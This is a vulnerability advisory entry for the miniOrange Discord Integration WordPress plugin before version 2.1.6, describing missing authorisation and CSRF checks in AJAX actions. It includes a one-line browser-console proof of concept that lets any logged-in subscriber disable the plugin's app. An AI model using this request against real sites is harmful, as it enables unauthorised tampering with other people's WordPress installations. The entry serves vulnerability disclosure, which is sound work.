Lucene search

K
wpvulndbLana CodesWPVDB-ID:A91D0501-C2A9-4C6C-B5DA-B3FC29442A4F
HistorySep 26, 2022 - 12:00 a.m.

miniOrange Discord Integration < 2.1.6 - Subscriber+ App Disabling

2022-09-2600:00:00
Lana Codes
wpscan.com
7
miniorange discord
integration
subscriber+
app disabling
lack of authorisation
csrf
ajax
logged in user

EPSS

0.001

Percentile

23.8%

The plugin does not have authorisation and CSRF in some of its AJAX actions, allowing any logged in users, such as subscriber to call them, and disable the app for example

PoC

Run the below command in the developer console of the web browser while being on the blog as any user, such as subscriber fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “method”: “POST”, “body”: ‘action=mo_discord_disable_app&app;_name=test’, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data));

EPSS

0.001

Percentile

23.8%

Related for WPVDB-ID:A91D0501-C2A9-4C6C-B5DA-B3FC29442A4F